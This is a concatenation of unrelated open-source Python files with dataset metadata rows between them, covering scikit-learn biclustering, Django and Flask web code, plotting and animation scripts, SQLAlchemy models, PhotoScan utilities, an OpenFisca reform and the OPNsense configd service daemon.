mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
Row partition labels.
`column_labels_` : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
| bsd-3-clause | 3,698,149,455,247,156,700 | 38.554656 | 79 | 0.56607 | false | 4.068291 | false | false | false |
TangentMicroServices/BuildService | api/views.py | 1 | 2442 | from django.contrib.auth.models import User
from api.models import Build, Metric, Smell
from rest_framework import routers, serializers, viewsets, decorators, response
from api.permissions import IsSelfOrSuperUser
from api.serializers import BuildSerializer, MetricSerializer, SmellSerializer
from rest_framework.permissions import IsAuthenticated, AllowAny
# Serializers define the API representation.
class MetricViewSet(viewsets.ModelViewSet):
queryset = Metric.objects.all()
serializer_class = MetricSerializer
class BuildViewSet(viewsets.ModelViewSet):
queryset = Build.objects.all()
serializer_class = BuildSerializer
class SmellViewSet(viewsets.ModelViewSet):
queryset = Smell.objects.all()
serializer_class = SmellSerializer
class HealthViewSet(viewsets.ViewSet):
permission_classes = (AllowAny, )
def list(self, request, format=None):
# make sure we can connect to the database
all_statuses = []
status = "up"
db_status = self.__can_connect_to_db()
all_statuses.append(db_status)
if "down" in all_statuses:
status = "down"
data = {
"data": {
"explorer": "/api-explorer",
},
"status": {
"db": db_status,
"status": status
}
}
return response.Response(data)
def __can_connect_to_db(self):
try:
user = User.objects.first()
return "up"
except Exception:
return "down"
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'health', HealthViewSet, base_name='health')
router.register(r'build', BuildViewSet, base_name='build')
router.register(r'metric', MetricViewSet, base_name='metric')
router.register(r'smell', SmellViewSet, base_name='smell')
"""
List all users.
**Notes:**
* Requires authenticated user
**Example usage:**
import requests
response = requests.get('/users/')
**Example response:**
[
{
"url": "http://192.168.99.100:8000/users/1/",
"username": "admin",
"email": "[email protected]",
"is_staff": true,
"first_name": "",
"last_name": ""
}
]
---
responseMessages:
- code: 403
message: Not authenticated
consumes:
- application/json
produces:
- application/json
""" | mit | 4,265,018,532,309,362,000 | 22.266667 | 79 | 0.63145 | false | 3.93871 | false | false | false |
inconvergent/differential-line | main_line_ani.py | 1 | 2648 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
from numpy import pi
# from numpy import cos
# from numpy import sin
from numpy.random import random
from numpy import zeros
# from numpy import linspace
from numpy import floor
from modules.growth import spawn_curl
NMAX = 10**6
SIZE = 512
ONE = 1./SIZE
PROCS = 2
INIT_NUM = 10
STP = ONE*0.1
NEARL = 4*ONE
FARL = 100*ONE
MID = 0.5
LINEWIDTH = 5.*ONE
BACK = [1,1,1,1]
FRONT = [0,0,0,0.05]
TWOPI = pi*2.
grains = 10
np_coords = zeros(shape=(NMAX,4), dtype='float')
np_vert_coords = zeros(shape=(NMAX,2), dtype='float')
def steps(df):
from time import time
from modules.helpers import print_stats
t1 = time()
df.optimize_position(STP)
spawn_curl(df, NEARL)
if df.safe_vertex_positions(3*STP)<0:
print('vertices reached the boundary. stopping.')
return False
t2 = time()
print_stats(0, t2-t1, df)
return True
def main():
from iutils.render import Animate
from differentialLine import DifferentialLine
from fn import Fn
from modules.show import sandstroke
from modules.show import dots
DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)
## arc
# angles = sorted(random(INIT_NUM)*pi*1.5)
# xys = []
# for a in angles:
# x = 0.5 + cos(a)*0.06
# y = 0.5 + sin(a)*0.06
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
## vertical line
#xx = sorted(0.45+0.1*random(INIT_NUM))
#yy = MID+0.005*(0.5-random(INIT_NUM))
#xys = []
#for x,y in zip(xx,yy):
#xys.append((x,y))
#DF.init_line_segment(xys, lock_edges=1)
# diagonal line
# yy = sorted(0.3+0.4*random(INIT_NUM))
# xx = 0.3+linspace(0,0.4,num=INIT_NUM)
# xys = []
# for x,y in zip(xx,yy):
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
angles = sorted(random(INIT_NUM)*TWOPI)
DF.init_circle_segment(MID,MID,FARL*0.2, angles)
fn = Fn(prefix='./res/', postfix='.png')
def wrap(render):
global np_coords
global np_vert_coords
global grains
## if fn is a path each image will be saved to that path
if not render.steps%3:
f = fn.name()
else:
f = None
grains += (-1)**floor(2*random())
print(grains)
if grains<0:
grains = 0
res = steps(DF)
render.set_front(FRONT)
coord_num = DF.np_get_edges_coordinates(np_coords)
sandstroke(render,np_coords[:coord_num,:],grains,f)
if not random()<0.1:
vert_num = DF.np_get_vert_coordinates(np_vert_coords)
dots(render,np_vert_coords[:vert_num,:],None)
return res
render = Animate(SIZE, BACK, FRONT, wrap)
render.start()
if __name__ == '__main__':
main()
| mit | 5,529,219,206,050,234,000 | 17.262069 | 60 | 0.628021 | false | 2.713115 | false | false | false |
pastgift/seed-website-py | app/index/hooks.py | 1 | 1472 | # -*- coding: utf-8 -*-
from flask import render_template, request, jsonify, flash, g
from flask.ext.login import current_user
from . import index_blueprint
from .. import db
from .. import babel
from ..models import User
from datetime import datetime
@index_blueprint.before_app_request
def before_request():
if not request.user_agent.browser:
return
user_browser = request.user_agent.browser.lower()
if user_browser != 'chrome':
# Do some thing
pass
@index_blueprint.after_app_request
def after_request(res):
# Record latest access
if current_user.is_authenticated:
current_user.ping()
return res
@babel.localeselector
def get_locale():
'''
Select Language Tag
'''
lang = request.cookies.get('lang', 'en')
# Uncomment to auto match language
# if not lang:
# lang = request.accept_languages.best_match(['zh_CN', 'zh_TW', 'ja'])
babel_lang_alias = {
'zh_CN': 'zh_Hans_CN',
'zh_TW': 'zh_Hant_TW',
'ja' : 'ja_JP',
# Add more languages
#'<Setting Name>': 'Babel Locale Name'
}
datepicker_lang_alias = {
'zh_CN': 'zh-CN',
'zh_TW': 'zh-TW',
# Add more languages
#'<Setting Name>': 'jQuery-datapicker Locale Name'
}
g.lang = lang
g.babel_lang = babel_lang_alias.get(lang, lang)
g.datepicker_lang = datepicker_lang_alias.get(lang, lang)
return g.babel_lang | mit | 1,368,370,693,941,926,000 | 23.147541 | 78 | 0.608696 | false | 3.431235 | false | false | false |
dean0x7d/pybinding | pybinding/support/collections.py | 1 | 3143 | import numpy as np
from matplotlib.collections import Collection
from matplotlib.artist import allow_rasterization
# noinspection PyAbstractClass
class CircleCollection(Collection):
"""Custom circle collection
The default matplotlib `CircleCollection` creates circles based on their
area in screen units. This class uses the radius in data units. It behaves
like a much faster version of a `PatchCollection` of `Circle`.
The implementation is similar to `EllipseCollection`.
"""
def __init__(self, radius, **kwargs):
super().__init__(**kwargs)
from matplotlib import path, transforms
self.radius = np.atleast_1d(radius)
self._paths = [path.Path.unit_circle()]
self.set_transform(transforms.IdentityTransform())
self._transforms = np.empty((0, 3, 3))
def _set_transforms(self):
ax = self.axes
self._transforms = np.zeros((self.radius.size, 3, 3))
self._transforms[:, 0, 0] = self.radius * ax.bbox.width / ax.viewLim.width
self._transforms[:, 1, 1] = self.radius * ax.bbox.height / ax.viewLim.height
self._transforms[:, 2, 2] = 1
@allow_rasterization
def draw(self, renderer):
self._set_transforms()
super().draw(renderer)
class Circle3DCollection(CircleCollection):
def __init__(self, radius, zs=0, zdir='z', depthshade=True, **kwargs):
super().__init__(radius, **kwargs)
self._depthshade = depthshade
self.set_3d_properties(zs, zdir)
self._A0 = self._A
def set_array(self, array):
self._A0 = array
super().set_array(array)
def set_3d_properties(self, zs, zdir):
# Force the collection to initialize the face and edgecolors
# just in case it is a scalarmappable with a colormap.
self.update_scalarmappable()
offsets = self.get_offsets()
if len(offsets) > 0:
xs, ys = list(zip(*offsets))
else:
xs = []
ys = []
from mpl_toolkits.mplot3d.art3d import juggle_axes
self._offsets3d = juggle_axes(xs, ys, np.atleast_1d(zs), zdir)
self._facecolor3d = self.get_facecolor()
self._edgecolor3d = self.get_edgecolor()
def do_3d_projection(self, renderer):
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d.art3d import zalpha
from matplotlib import colors as mcolors
# transform and sort in z direction
v = np.array(proj3d.proj_transform_clip(*self._offsets3d, M=renderer.M)[:3])
idx = v[2].argsort()[::-1]
vzs = v[2, idx]
self.set_offsets(v[:2, idx].transpose())
super().set_array(self._A0[idx])
fcs = zalpha(self._facecolor3d, vzs) if self._depthshade else self._facecolor3d
fcs = mcolors.colorConverter.to_rgba_array(fcs, self._alpha)
self.set_facecolors(fcs)
ecs = zalpha(self._edgecolor3d, vzs) if self._depthshade else self._edgecolor3d
ecs = mcolors.colorConverter.to_rgba_array(ecs, self._alpha)
self.set_edgecolors(ecs)
return min(vzs) if vzs.size > 0 else np.nan
| bsd-2-clause | 452,870,017,756,134,800 | 36.416667 | 87 | 0.634108 | false | 3.575654 | false | false | false |
KenleyArai/ComicbookTime | app/models.py | 1 | 4953 | from app import db
from flask.ext.security import RoleMixin
from datetime import datetime
# Defining the table for the many-many relationship of User and Comic
bought_comics = db.Table('bought',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
follows_series = db.Table('follows',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('series_id', db.Integer, db.ForeignKey('series.id')),
)
created = db.Table('created_comic',
db.Column('creator_id', db.Integer, db.ForeignKey('creator.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
# Define models
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
google_id = db.Column(db.String, unique=True)
# many to many: A user can have many comics
bought_comics = db.relationship('Comic',
secondary=bought_comics,
backref=db.backref('users', lazy='dynamic'),
order_by='Comic.series_id')
follows_series = db.relationship('Series',
secondary=follows_series,
backref=db.backref('users', lazy='dynamic'))
roles = db.relationship('Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
connections = db.relationship('Connection',
backref=db.backref('user', lazy='joined'),
cascade="all", uselist=False)
active = False
def is_active(self):
return True
def get_id(self):
return self.id
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def __init__(self, google_id, active, roles):
self.google_id = google_id
self.active = active
self.roles = roles
def __repr__(self):
return "<Google ID {}>".format(self.google_id)
class Connection(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
provider_id = db.Column(db.String(255))
full_name = db.Column(db.String(255))
provider_user_id = db.Column(db.String(255))
access_token = db.Column(db.String(255))
secret = db.Column(db.String(255))
display_name = db.Column(db.String(255))
profile_url = db.Column(db.String(512))
image_url = db.Column(db.String(512))
rank = db.Column(db.Integer)
class Series(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
comics = db.relationship('Comic', backref='Series',lazy='dynamic')
def __init__(self,title,comics):
self.title = title
self.comics = comics
def __repr__(self):
return "{}".format(self.title)
class Comic(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
source_url = db.Column(db.String)
image_link = db.Column(db.String)
release_date = db.Column(db.DateTime)
series_id = db.Column(db.Integer, db.ForeignKey('series.id'))
def __init__(self, title, source_url, image_link, release_date):
self.title = title
self.source_url = source_url
self.image_link = image_link
self.release_date = release_date
def is_avail(self):
return self.release_date < datetime.now()
def get_dict(self):
return {'id': self.id,
'title': self.title,
'source_url': self.source_url,
'image_link': self.image_link,
'release_date': datetime.date(self.release_date).isoformat(),
'series_id': self.series_id,
'avail': self.is_avail()}
def __repr__(self):
data = self.get_dict()
return "<Title:{title}><Source Url:{source_url}><Image Link:{image_link}><Release Date:{release_date}>".format(**data)
class Creator(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
created_comics = db.relationship('Comic',
secondary=created,
backref=db.backref('creator', lazy='dynamic'))
| mit | -8,246,468,935,077,410,000 | 35.153285 | 126 | 0.566727 | false | 3.752273 | false | false | false |
HackerDom/qoala | qoala/settings/common.py | 1 | 4599 | # -*- coding: utf-8 -*-
"""
Django settings for qoala project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.conf import global_settings
# https://stackoverflow.com/a/21693784/6832066
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + [
"django.core.context_processors.request",
]
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
DATA_SUFFIX = os.environ.get('DATA_SUFFIX', '')
DATA_DIR = os.path.join(BASE_DIR, 'data' + DATA_SUFFIX)
TASKS_DIR = os.path.join(DATA_DIR, 'tasks')
TASKS_DATA_DIR = os.path.join(DATA_DIR, 'tmptasks')
INSTANCE_NAME = 'Qoala'
# App/Library Paths
sys.path.append(os.path.join(BASE_DIR, 'apps'))
sys.path.append(os.path.join(BASE_DIR, 'lib'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3tqlw0=fqml%ivszvim&8)$(%&#_69cmulxm-4ai-fib9=+#%*'
# Salt for generating tasks patterns
TASK_SALT = "asdkajdlkasjdlkajsdlkajlskdjalksdjkl"
ANSWERS_PER_MINUTE = 30
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
ALLOWED_HOSTS = []
AUTH_USER_MODEL = "teams.Team"
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend', 'teams.auth.TokenAuthBackend')
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/teams/login'
LOGOUT_URL = '/teams/logout'
SHOW_ZEROS_ON_SCOREBOARD = True
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
# Database migrations
# 'south',
# Global context
'base',
# Own apps
'teams',
'quests',
'board'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'qoala.urls'
WSGI_APPLICATION = 'qoala.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
#LANGUAGE_CODE = 'en-us'
LANGUAGE_CODE = 'ru'
LANGUAGES = (
('ru', 'Russian'),
('en', 'English'),
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
TIME_ZONE = 'Asia/Yekaterinburg'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "base/static"),
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
def custom_show_toolbar(request):
""" Only show the debug toolbar to users with the superuser flag. """
return request.user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'qoala.settings.custom_show_toolbar',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# Uncomment these to activate and customize Celery:
# CELERY_ALWAYS_EAGER = False # required to activate celeryd
#BROKER_URL = 'amqp://guest:guest@localhost//'
| gpl-3.0 | -744,898,877,219,937,500 | 25.130682 | 102 | 0.724288 | false | 3.247881 | false | false | false |
rmsare/sfmtools | sfmtools.py | 1 | 2864 | """ Utility functions for PhotoScan processing """
import os, sys
import PhotoScan
def align_and_clean_photos(chunk):
ncameras = len(chunk.cameras)
for frame in chunk.frames:
frame.matchPhotos()
chunk.alignCameras()
for camera in chunk.cameras:
if camera.transform is None:
chunk.remove(camera)
naligned = len(chunk.cameras)
print('%d/%d cameras aligned' % (naligned, ncameras))
def batch_process(projectname, threshold, resolution):
doc = PhotoScan.app.document
if projectname[-4:] is not '.psz':
projectname = ''.join([projectname, '.psz'])
if os.path.isfile(projectname):
doc.open(projectname)
folders = ['dems', 'reports', 'orthos']
for folder in folders:
if not os.path.isdir(folder):
os.mkdir(folder)
for chunk in doc.chunks:
filter_photos_by_quality(chunk, threshold)
align_and_clean_photos(chunk)
chunk.buildDenseCloud(quality=PhotoScan.HighQuality)
doc.alignChunks(doc.chunks, doc.chunks[0])
doc.mergeChunks(doc.chunks, merge_dense_clouds=True, merge_markers=True)
chunk = doc.chunks[len(doc.chunks)-1]
chunk.buildModel(surface=PhotoScan.HeightField, face_count=PhotoScan.HighFaceCount)
chunk.exportDem('dems/test_0.5m.tif', format='tif', dx=0.5, dy=0.5)
#export_dems('dems/', 'tif', resolution)
#export_orthos('orthos/', resolution)
for chunk in doc.chunks:
filename = ''.join(['reports/', ''.join(chunk.label.split(' ')), '.pdf'])
chunk.exportReport(filename)
doc.save(projectname)
def export_dems(pathname, formatstring, resolution):
if not os.path.isdir(pathname):
os.mkdir(pathname)
if pathname[-1:] is not '/':
pathname = ''.join([pathname, '/'])
nchunks = len(PhotoScan.app.document.chunks)
nexported = nchunks
for chunk in PhotoScan.app.document.chunks:
filename = ''.join([pathname, ''.join(chunk.label.split(' ')), '.', formatstring])
exported = chunk.exportDem(filename, format=formatstring)
if not exported:
print('Export failed:', chunk.label)
nexported -= 1
print('%d/%d DEMs exported' % (nexported, nchunks))
def filter_photos_by_quality(chunk, threshold):
for camera in chunk.cameras:
if camera.frames[0].photo.meta['Image/Quality'] is None:
chunk.estimateImageQuality([camera])
if float(camera.frames[0].photo.meta['Image/Quality']) < threshold:
chunk.remove(camera)
def load_masks_for_chunk(chunk, mask_dir):
for camera in chunk.cameras:
label = camera.label
mask_fname = mask_dir + label + '_mask.png'
if os.path.isfile(mask_fname):
this_mask = PhotoScan.Mask.load(mask_fname)
camera.mask = this_mask
| mit | -1,115,124,108,005,124,100 | 33.506024 | 90 | 0.633729 | false | 3.602516 | false | false | false |
MalkIPP/ipp_work | ipp_work/reforms/ir_marg_rate.py | 1 | 2157 | # -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
import logging
from openfisca_core import formulas, reforms
from openfisca_france.model.prelevements_obligatoires.impot_revenu import ir
log = logging.getLogger(__name__)
class rni(formulas.SimpleFormulaColumn):
reference = ir.rni
label = u"Revenu net imposable"
url = "http://impotsurlerevenu.org/definitions/115-revenu-net-imposable.php"
def function(self, simulation, period):
''' Revenu net imposable ou déficit à reporter'''
period = period.start.offset('first-of', 'month').period('year')
rng = simulation.calculate('rng', period)
abat_spe = simulation.calculate('abat_spe', period)
print "passe par simulation"
return period, rng - abat_spe + 10
def build_reform(tax_benefit_system):
# reference_legislation_json = tax_benefit_system.legislation_json
# reform_legislation_json = copy.deepcopy(reference_legislation_json)
# reform_legislation_json['children'].update(reform_legislation_subtree)
Reform = reforms.make_reform(
# legislation_json = reform_legislation_json,
name = u'Revenu imposable + 10',
new_formulas = [rni],
reference = tax_benefit_system,
)
return Reform()
| agpl-3.0 | 397,067,888,802,936,060 | 32.153846 | 80 | 0.713225 | false | 3.415214 | false | false | false |
opnsense/core | src/opnsense/service/configd.py | 1 | 6724 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
package : configd
function: delivers a process coordinator to handle frontend functions
"""
import os
import sys
import logging
import signal
import time
import socket
import subprocess
import syslog
import modules.processhandler
import modules.csconfigparser
from modules.daemonize import Daemonize
import cProfile
# find program path
program_path = os.path.dirname(os.path.abspath(__file__))
# set working directory to program_path
sys.path.append(program_path)
os.chdir(program_path)
def get_config():
""" open configuration
"""
cnf = modules.csconfigparser.CSConfigParser()
cnf.read('conf/configd.conf')
return cnf
def validate_config(cnf):
""" validate configuration, exit on missing item
:param cnf: config handle
"""
for config_item in ['socket_filename', 'pid_filename']:
if cnf.has_section('main') == False or cnf.has_option('main', config_item) == False:
print('configuration item main/%s not found in %s/conf/configd.conf' % (config_item, program_path))
sys.exit(0)
def main(cnf, simulate=False, single_threaded=False):
""" configd startup
:param cnf: config handle
:param simulate: simulate only
:param single_threaded: start single threaded
"""
# setup configd environment to use for all configured actions
if not cnf.has_section('environment'):
config_environment = os.environ.copy()
else:
config_environment = dict()
for envKey in cnf.items('environment'):
config_environment[envKey[0]] = envKey[1]
# run process coordinator ( on console or as daemon )
# if command-line arguments contain "emulate", start in emulation mode
if simulate:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment,
simulation_mode=True)
else:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment)
proc_handler.single_threaded = single_threaded
proc_handler.run()
def run_watch():
""" start configd process and restart if it dies unexpected
"""
current_child_pid = None
def signal_handler(sig, frame):
if current_child_pid is not None:
os.kill(current_child_pid, sig)
sys.exit(1)
signal.signal(signal.SIGTERM, signal_handler)
while True:
process = subprocess.Popen(['/usr/local/opnsense/service/configd.py', 'console'])
# save created pid for signal_handler() to use
current_child_pid = process.pid
process.wait()
# wait a small period of time before trying to restart a new process
time.sleep(0.5)
this_config = get_config()
validate_config(this_config)
if len(sys.argv) > 1 and 'console' in sys.argv[1:]:
print('run %s in console mode' % sys.argv[0])
syslog.openlog("configd.py")
if 'profile' in sys.argv[1:]:
# profile configd
# for graphical output use gprof2dot:
# gprof2dot -f pstats /tmp/configd.profile -o /tmp/callingGraph.dot
# (https://code.google.com/p/jrfonseca/wiki/Gprof2Dot)
print ("...<ctrl><c> to stop profiling")
profile = cProfile.Profile()
profile.enable(subcalls=True)
try:
if len(sys.argv) > 1 and 'simulate' in sys.argv[1:]:
print('simulate calls.')
main(cnf=this_config, simulate=True, single_threaded=True)
else:
main(cnf=this_config, single_threaded=True)
except KeyboardInterrupt:
pass
except:
raise
profile.disable()
profile.dump_stats('/tmp/configd.profile')
else:
main(cnf=this_config)
else:
# run as daemon, wrap the actual work process to enable automatic restart on sudden death
syslog_socket = "/var/run/log"
if os.path.exists(syslog_socket):
try:
# bind log handle to syslog to catch messages from Daemonize()
# (if syslog facility is active)
loghandle = logging.getLogger("configd.py")
loghandle.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=syslog_socket,
facility=logging.handlers.SysLogHandler.LOG_DAEMON)
handler.setFormatter(logging.Formatter("%(name)s %(message)s"))
loghandle.addHandler(handler)
except socket.error:
loghandle = None
else:
loghandle = None
# daemonize process
daemon = Daemonize(app=__file__.split('/')[-1].split('.py')[0],
